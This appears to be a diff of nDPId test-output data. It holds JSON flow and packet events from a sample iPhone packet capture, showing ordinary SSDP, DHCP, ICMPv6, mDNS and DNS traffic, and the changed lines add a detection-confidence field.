+00639{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":18,"source":"iphone.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454585624,"flow_last_seen":1582454585624,"flow_idle_time":180000,"flow_min_l4_payload_len":126,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":126,"flow_avg_l4_payload_len":126,"midstream":0,"ts_msec":1582454585624,"l3_proto":"ip4","src_ip":"169.254.225.216","dst_ip":"239.255.255.250","src_port":60538,"dst_port":1900,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}}
 00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":19,"source":"iphone.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454585625,"flow_last_seen":1582454585625,"flow_idle_time":180000,"flow_min_l4_payload_len":126,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":126,"flow_avg_l4_payload_len":126,"midstream":0,"ts_msec":1582454585625,"l3_proto":"ip4","src_ip":"192.168.2.1","dst_ip":"239.255.255.250","src_port":51411,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00600{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":19,"source":"iphone.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":1,"flow_last_seen":1582454585625,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":168,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":168,"pkt_l4_len":134,"ts_msec":1582454585625,"pkt":"AQBef\/\/6xiwDYGpkCABFAACaYI8AAAERpiDAqAIB7\/\/\/+sjTB2wAhk51TS1TRUFSQ0ggKiBIVFRQLzEuMQ0KSE9TVDogMjM5LjI1NS4yNTUuMjUwOjE5MDANCk1BTjogInNzZHA6ZGlzY292ZXIiDQpNWDogMQ0KU1Q6IHVybjpkaWFsLW11bHRpc2NyZWVuLW9yZzpzZXJ2aWNlOmRpYWw6MQ0KDQoA"}
-00609{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":19,"source":"iphone.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454585625,"flow_last_seen":1582454585625,"flow_idle_time":180000,"flow_min_l4_payload_len":126,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":126,"flow_avg_l4_payload_len":126,"midstream":0,"ts_msec":1582454585625,"l3_proto":"ip4","src_ip":"192.168.2.1","dst_ip":"239.255.255.250","src_port":51411,"dst_port":1900,"l4_proto":"udp","ndpi": {"proto":"SSDP","breed":"Acceptable","category":"System"}}
+00635{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":19,"source":"iphone.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454585625,"flow_last_seen":1582454585625,"flow_idle_time":180000,"flow_min_l4_payload_len":126,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":126,"flow_avg_l4_payload_len":126,"midstream":0,"ts_msec":1582454585625,"l3_proto":"ip4","src_ip":"192.168.2.1","dst_ip":"239.255.255.250","src_port":51411,"dst_port":1900,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}}
 00493{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":20,"source":"iphone.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":2,"flow_last_seen":1582454586170,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"ts_msec":1582454586170,"pkt":"\/\/\/\/\/\/\/\/xiwDYGpkCABFAABIdggAAEARfkzAqAIBwKgC\/+EV4RUANNgcU3BvdFVkcDDcFXQoLlJiTAABAARIlcIDokHeIIm5eNggVkvVDJHA6KPmCng="}
 00946{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":22,"source":"iphone.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":3,"flow_last_seen":1582454586688,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":424,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":424,"pkt_l4_len":370,"ts_msec":1582454586688,"pkt":"MzMAAAD7xiwDYGpkht1gBTIBAXIR\/\/6AAAAAAAAAxCwD\/\/5gamT\/AgAAAAAAAAAAAAAAAAD7FOkU6QFyhM0AAAAAABEAAQAAAAEIX2FpcnBvcnQEX3RjcAVsb2NhbAAADAABD19jb21wYW5pb24tbGlua8AVAAwAAQ1fYXBwbGUtbW9iZGV2wBUADAABCDhmYjIwN2RlBF9zdWIOX2FwcGxlLW1vYmRldjLAFQAMAAEPX2FwcGxlLXBhaXJhYmxlwBUADAABC19nb29nbGVjYXN0wBUADAABBl91c2NhbsAVAAwAAQdfdXNjYW5zwBUADAABB19pcHB1c2LAFQAMAAEIX3NjYW5uZXLAFQAMAAEEX2lwcMAVAAwAAQVfaXBwc8AVAAwAAQhfcHJpbnRlcsAVAAwAAQ9fcGRsLWRhdGFzdHJlYW3AFQAMAAEEX3B0cMAVAAwAAQRfcmZiwBUADAABBl9hZGlza8AVAAwAAcAlAAwAAQAADe8AEA1MdWNh4oCZcyBpTWFjwCUAACkFoAAAEZQAEgAEAA4AAMQsAwZJ\/sYsA2BqZA=="}
 00570{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":30,"source":"iphone.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454595352,"flow_last_seen":1582454595352,"flow_idle_time":180000,"flow_min_l4_payload_len":300,"flow_max_l4_payload_len":300,"flow_tot_l4_payload_len":300,"flow_avg_l4_payload_len":300,"midstream":0,"ts_msec":1582454595352,"l3_proto":"ip4","src_ip":"192.168.2.1","dst_ip":"192.168.2.17","src_port":67,"dst_port":68,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00832{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":30,"source":"iphone.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":1,"flow_last_seen":1582454595352,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":342,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":342,"pkt_l4_len":308,"ts_msec":1582454595352,"pkt":"xGGLNYKpxiwDYGpkCABFAAFILXQAAP8RB87AqAIBwKgCEQBDAEQBNJWvAgEGALeWutEAAAAAAAAAAMCoAhHAqAIBAAAAAMRhizWCqQAAAAAAAAAAAABMdWNhcy1pTWFjLmxvY2FsAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABjglNjNQECNgTAqAIBMwQAAU4gAQT\/\/\/8AAwTAqAIBBgTAqAIB\/wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"}
-00661{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":30,"source":"iphone.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454595352,"flow_last_seen":1582454595352,"flow_idle_time":180000,"flow_min_l4_payload_len":300,"flow_max_l4_payload_len":300,"flow_tot_l4_payload_len":300,"flow_avg_l4_payload_len":300,"midstream":0,"ts_msec":1582454595352,"l3_proto":"ip4","src_ip":"192.168.2.1","dst_ip":"192.168.2.17","src_port":67,"dst_port":68,"l4_proto":"udp","ndpi": {"proto":"DHCP","breed":"Acceptable","category":"Network"},"dhcp": {"hostname":"","fingerprint":"","class_ident":""}}
+00687{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":30,"source":"iphone.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454595352,"flow_last_seen":1582454595352,"flow_idle_time":180000,"flow_min_l4_payload_len":300,"flow_max_l4_payload_len":300,"flow_tot_l4_payload_len":300,"flow_avg_l4_payload_len":300,"midstream":0,"ts_msec":1582454595352,"l3_proto":"ip4","src_ip":"192.168.2.1","dst_ip":"192.168.2.17","src_port":67,"dst_port":68,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DHCP","breed":"Acceptable","category":"Network"},"dhcp": {"hostname":"","fingerprint":"","class_ident":""}}
 00536{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":31,"source":"iphone.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454595354,"flow_last_seen":1582454595354,"flow_idle_time":120000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":32,"flow_tot_l4_payload_len":32,"flow_avg_l4_payload_len":32,"midstream":0,"ts_msec":1582454595354,"l3_proto":"ip6","src_ip":"::","dst_ip":"ff02::1:ff98:a29c","l4_proto":"icmp6","flow_datalink":1,"flow_max_packets":3}
 00490{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":31,"source":"iphone.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":1,"flow_last_seen":1582454595354,"flow_idle_time":120000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"ts_msec":1582454595354,"pkt":"MzP\/mKKcxGGLNYKpht1gAAAAACA6\/wAAAAAAAAAAAAAAAAAAAAD\/AgAAAAAAAAAAAAH\/mKKchwBApQAAAAD+gAAAAAAAAAgjPxeCmKKcDgEq29a5HEA="}
-00571{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":31,"source":"iphone.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454595354,"flow_last_seen":1582454595354,"flow_idle_time":120000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":32,"flow_tot_l4_payload_len":32,"flow_avg_l4_payload_len":32,"midstream":0,"ts_msec":1582454595354,"l3_proto":"ip6","src_ip":"::","dst_ip":"ff02::1:ff98:a29c","l4_proto":"icmp6","ndpi": {"proto":"ICMPV6","breed":"Acceptable","category":"Network"}}
+00597{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":31,"source":"iphone.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454595354,"flow_last_seen":1582454595354,"flow_idle_time":120000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":32,"flow_tot_l4_payload_len":32,"flow_avg_l4_payload_len":32,"midstream":0,"ts_msec":1582454595354,"l3_proto":"ip6","src_ip":"::","dst_ip":"ff02::1:ff98:a29c","l4_proto":"icmp6","ndpi": {"confidence": {"4":"DPI"},"proto":"ICMPV6","breed":"Acceptable","category":"Network"}}
 00544{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":32,"source":"iphone.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454595354,"flow_last_seen":1582454595354,"flow_idle_time":120000,"flow_min_l4_payload_len":8,"flow_max_l4_payload_len":8,"flow_tot_l4_payload_len":8,"flow_avg_l4_payload_len":8,"midstream":0,"ts_msec":1582454595354,"l3_proto":"ip6","src_ip":"fe80::823:3f17:8298:a29c","dst_ip":"ff02::2","l4_proto":"icmp6","flow_datalink":1,"flow_max_packets":3}
 00457{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":32,"source":"iphone.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":1,"flow_last_seen":1582454595354,"flow_idle_time":120000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":62,"pkt_l4_len":8,"ts_msec":1582454595354,"pkt":"MzMAAAACxGGLNYKpht1gCzl3AAg6\/\/6AAAAAAAAACCM\/F4KYopz\/AgAAAAAAAAAAAAAAAAAChQAQyAAAAAA="}
-00579{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":32,"source":"iphone.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454595354,"flow_last_seen":1582454595354,"flow_idle_time":120000,"flow_min_l4_payload_len":8,"flow_max_l4_payload_len":8,"flow_tot_l4_payload_len":8,"flow_avg_l4_payload_len":8,"midstream":0,"ts_msec":1582454595354,"l3_proto":"ip6","src_ip":"fe80::823:3f17:8298:a29c","dst_ip":"ff02::2","l4_proto":"icmp6","ndpi": {"proto":"ICMPV6","breed":"Acceptable","category":"Network"}}
+00605{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":32,"source":"iphone.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454595354,"flow_last_seen":1582454595354,"flow_idle_time":120000,"flow_min_l4_payload_len":8,"flow_max_l4_payload_len":8,"flow_tot_l4_payload_len":8,"flow_avg_l4_payload_len":8,"midstream":0,"ts_msec":1582454595354,"l3_proto":"ip6","src_ip":"fe80::823:3f17:8298:a29c","dst_ip":"ff02::2","l4_proto":"icmp6","ndpi": {"confidence": {"4":"DPI"},"proto":"ICMPV6","breed":"Acceptable","category":"Network"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":33,"source":"iphone.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454595839,"flow_last_seen":1582454595839,"flow_idle_time":180000,"flow_min_l4_payload_len":66,"flow_max_l4_payload_len":66,"flow_tot_l4_payload_len":66,"flow_avg_l4_payload_len":66,"midstream":0,"ts_msec":1582454595839,"l3_proto":"ip6","src_ip":"fe80::823:3f17:8298:a29c","dst_ip":"ff02::fb","src_port":5353,"dst_port":5353,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00548{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":33,"source":"iphone.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":1,"flow_last_seen":1582454595839,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":128,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":128,"pkt_l4_len":74,"ts_msec":1582454595839,"pkt":"MzMAAAD7xGGLNYKpht1gD8z1AEoR\/\/6AAAAAAAAACCM\/F4KYopz\/AgAAAAAAAAAAAAAAAAD7FOkU6QBKKFMAAAAAAAEAAAAAAAEIX2hvbWVraXQEX3RjcAVsb2NhbAAADIABAAApBaAAABGUABIABAAOAADmYYs1gqnEYYs1gqk="}
-00653{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":33,"source":"iphone.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454595839,"flow_last_seen":1582454595839,"flow_idle_time":180000,"flow_min_l4_payload_len":66,"flow_max_l4_payload_len":66,"flow_tot_l4_payload_len":66,"flow_avg_l4_payload_len":66,"midstream":0,"ts_msec":1582454595839,"l3_proto":"ip6","src_ip":"fe80::823:3f17:8298:a29c","dst_ip":"ff02::fb","src_port":5353,"dst_port":5353,"l4_proto":"udp","ndpi": {"proto":"MDNS","breed":"Acceptable","category":"Network"},"mdns": {"answer":"_homekit._tcp.local"}}
+00679{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":33,"source":"iphone.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454595839,"flow_last_seen":1582454595839,"flow_idle_time":180000,"flow_min_l4_payload_len":66,"flow_max_l4_payload_len":66,"flow_tot_l4_payload_len":66,"flow_avg_l4_payload_len":66,"midstream":0,"ts_msec":1582454595839,"l3_proto":"ip6","src_ip":"fe80::823:3f17:8298:a29c","dst_ip":"ff02::fb","src_port":5353,"dst_port":5353,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"MDNS","breed":"Acceptable","category":"Network"},"mdns": {"answer":"_homekit._tcp.local"}}
 00549{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":34,"source":"iphone.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454596364,"flow_last_seen":1582454596364,"flow_idle_time":120000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":0,"ts_msec":1582454596364,"l3_proto":"ip6","src_ip":"fe80::823:3f17:8298:a29c","dst_ip":"ff02::16","l4_proto":"icmp6","flow_datalink":1,"flow_max_packets":3}
 00553{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":34,"source":"iphone.pcap","alias":"nDPId-test","flow_id":14,"flow_packet_id":1,"flow_last_seen":1582454596364,"flow_idle_time":120000,"pkt_oversize":false,"pkt_caplen":130,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":62,"pkt_len":130,"pkt_l4_len":68,"ts_msec":1582454596364,"pkt":"MzMAAAAWxGGLNYKpht1gAAAAAEwAAf6AAAAAAAAACCM\/F4KYopz\/AgAAAAAAAAAAAAAAAAAWOgABAAUCAACPAIFJAAAAAwQAAAD\/AgAAAAAAAAAAAAAAAAD7BAAAAP8CAAAAAAAAAAAAAv8d2dAEAAAA\/wIAAAAAAAAAAAAB\/5iinA=="}
-00584{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":34,"source":"iphone.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454596364,"flow_last_seen":1582454596364,"flow_idle_time":120000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":0,"ts_msec":1582454596364,"l3_proto":"ip6","src_ip":"fe80::823:3f17:8298:a29c","dst_ip":"ff02::16","l4_proto":"icmp6","ndpi": {"proto":"ICMPV6","breed":"Acceptable","category":"Network"}}
+00610{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":34,"source":"iphone.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454596364,"flow_last_seen":1582454596364,"flow_idle_time":120000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":0,"ts_msec":1582454596364,"l3_proto":"ip6","src_ip":"fe80::823:3f17:8298:a29c","dst_ip":"ff02::16","l4_proto":"icmp6","ndpi": {"confidence": {"4":"DPI"},"proto":"ICMPV6","breed":"Acceptable","category":"Network"}}
 00832{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":36,"source":"iphone.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":2,"flow_last_seen":1582454596370,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":342,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":342,"pkt_l4_len":308,"ts_msec":1582454596370,"pkt":"xGGLNYKpxiwDYGpkCABFAAFILXUAAP8RB83AqAIBwKgCEQBDAEQBNJKvAgEGALeWutEAAAAAAAAAAMCoAhHAqAIBAAAAAMRhizWCqQAAAAAAAAAAAABMdWNhcy1pTWFjLmxvY2FsAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABjglNjNQEFNgTAqAIBMwQAAU4gAQT\/\/\/8AAwTAqAIBBgTAqAIB\/wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"}
 00548{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":39,"source":"iphone.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":2,"flow_last_seen":1582454596847,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":128,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":128,"pkt_l4_len":74,"ts_msec":1582454596847,"pkt":"MzMAAAD7xGGLNYKpht1gD8z1AEoR\/\/6AAAAAAAAACCM\/F4KYopz\/AgAAAAAAAAAAAAAAAAD7FOkU6QBKKNMAAAAAAAEAAAAAAAEIX2hvbWVraXQEX3RjcAVsb2NhbAAADAABAAApBaAAABGUABIABAAOAADmYYs1gqnEYYs1gqk="}
 00553{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":42,"source":"iphone.pcap","alias":"nDPId-test","flow_id":14,"flow_packet_id":2,"flow_last_seen":1582454597360,"flow_idle_time":120000,"pkt_oversize":false,"pkt_caplen":130,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":62,"pkt_len":130,"pkt_l4_len":68,"ts_msec":1582454597360,"pkt":"MzMAAAAWxGGLNYKpht1gAAAAAEwAAf6AAAAAAAAACCM\/F4KYopz\/AgAAAAAAAAAAAAAAAAAWOgABAAUCAACPAIFJAAAAAwQAAAD\/AgAAAAAAAAAAAAAAAAD7BAAAAP8CAAAAAAAAAAAAAv8d2dAEAAAA\/wIAAAAAAAAAAAAB\/5iinA=="}
 00569{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":49,"source":"iphone.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454598204,"flow_last_seen":1582454598204,"flow_idle_time":180000,"flow_min_l4_payload_len":48,"flow_max_l4_payload_len":48,"flow_tot_l4_payload_len":48,"flow_avg_l4_payload_len":48,"midstream":0,"ts_msec":1582454598204,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"192.168.2.1","src_port":63381,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00489{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":49,"source":"iphone.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":1,"flow_last_seen":1582454598204,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":90,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":90,"pkt_l4_len":56,"ts_msec":1582454598204,"pkt":"xiwDYGpkxGGLNYKpCABFAABMpW8AAP8RkM7AqAIRwKgCAfeVADUAOH2lldMBAAABAAAAAAAAE3AyNi1rZXl2YWx1ZXNlcnZpY2UGaWNsb3VkA2NvbQAAAQAB"}
-00755{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":49,"source":"iphone.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454598204,"flow_last_seen":1582454598204,"flow_idle_time":180000,"flow_min_l4_payload_len":48,"flow_max_l4_payload_len":48,"flow_tot_l4_payload_len":48,"flow_avg_l4_payload_len":48,"midstream":0,"ts_msec":1582454598204,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"192.168.2.1","src_port":63381,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS.AppleiCloud","breed":"Acceptable","category":"Web"},"dns": {"query":"p26-keyvalueservice.icloud.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
+00781{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":49,"source":"iphone.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454598204,"flow_last_seen":1582454598204,"flow_idle_time":180000,"flow_min_l4_payload_len":48,"flow_max_l4_payload_len":48,"flow_tot_l4_payload_len":48,"flow_avg_l4_payload_len":48,"midstream":0,"ts_msec":1582454598204,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"192.168.2.1","src_port":63381,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.AppleiCloud","breed":"Acceptable","category":"Web"},"dns": {"query":"p26-keyvalueservice.icloud.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
 00569{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":50,"source":"iphone.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454598205,"flow_last_seen":1582454598205,"flow_idle_time":180000,"flow_min_l4_payload_len":42,"flow_max_l4_payload_len":42,"flow_tot_l4_payload_len":42,"flow_avg_l4_payload_len":42,"midstream":0,"ts_msec":1582454598205,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"192.168.2.1","src_port":63143,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":50,"source":"iphone.pcap","alias":"nDPId-test","flow_id":16,"flow_packet_id":1,"flow_last_seen":1582454598205,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":84,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":84,"pkt_l4_len":50,"ts_msec":1582454598205,"pkt":"xiwDYGpkxGGLNYKpCABFAABGS9oAAP8R6mnAqAIRwKgCAfanADUAMj\/EHhQBAAABAAAAAAAADXAyNi1mbWZtb2JpbGUGaWNsb3VkA2NvbQAAAQAB"}
-00749{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":50,"source":"iphone.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454598205,"flow_last_seen":1582454598205,"flow_idle_time":180000,"flow_min_l4_payload_len":42,"flow_max_l4_payload_len":42,"flow_tot_l4_payload_len":42,"flow_avg_l4_payload_len":42,"midstream":0,"ts_msec":1582454598205,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"192.168.2.1","src_port":63143,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS.AppleiCloud","breed":"Acceptable","category":"Web"},"dns": {"query":"p26-fmfmobile.icloud.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
+00775{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":50,"source":"iphone.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454598205,"flow_last_seen":1582454598205,"flow_idle_time":180000,"flow_min_l4_payload_len":42,"flow_max_l4_payload_len":42,"flow_tot_l4_payload_len":42,"flow_avg_l4_payload_len":42,"midstream":0,"ts_msec":1582454598205,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"192.168.2.1","src_port":63143,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.AppleiCloud","breed":"Acceptable","category":"Web"},"dns": {"query":"p26-fmfmobile.icloud.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
 00569{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":51,"source":"iphone.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454598209,"flow_last_seen":1582454598209,"flow_idle_time":180000,"flow_min_l4_payload_len":41,"flow_max_l4_payload_len":41,"flow_tot_l4_payload_len":41,"flow_avg_l4_payload_len":41,"midstream":0,"ts_msec":1582454598209,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"192.168.2.1","src_port":61862,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":51,"source":"iphone.pcap","alias":"nDPId-test","flow_id":17,"flow_packet_id":1,"flow_last_seen":1582454598209,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":83,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":83,"pkt_l4_len":49,"ts_msec":1582454598209,"pkt":"xiwDYGpkxGGLNYKpCABFAABFIREAAP8RFTTAqAIRwKgCAfGmADUAMT0yjvEBAAABAAAAAAAACmdzcGUzNS1zc2wCbHMFYXBwbGUDY29tAAABAAE="}
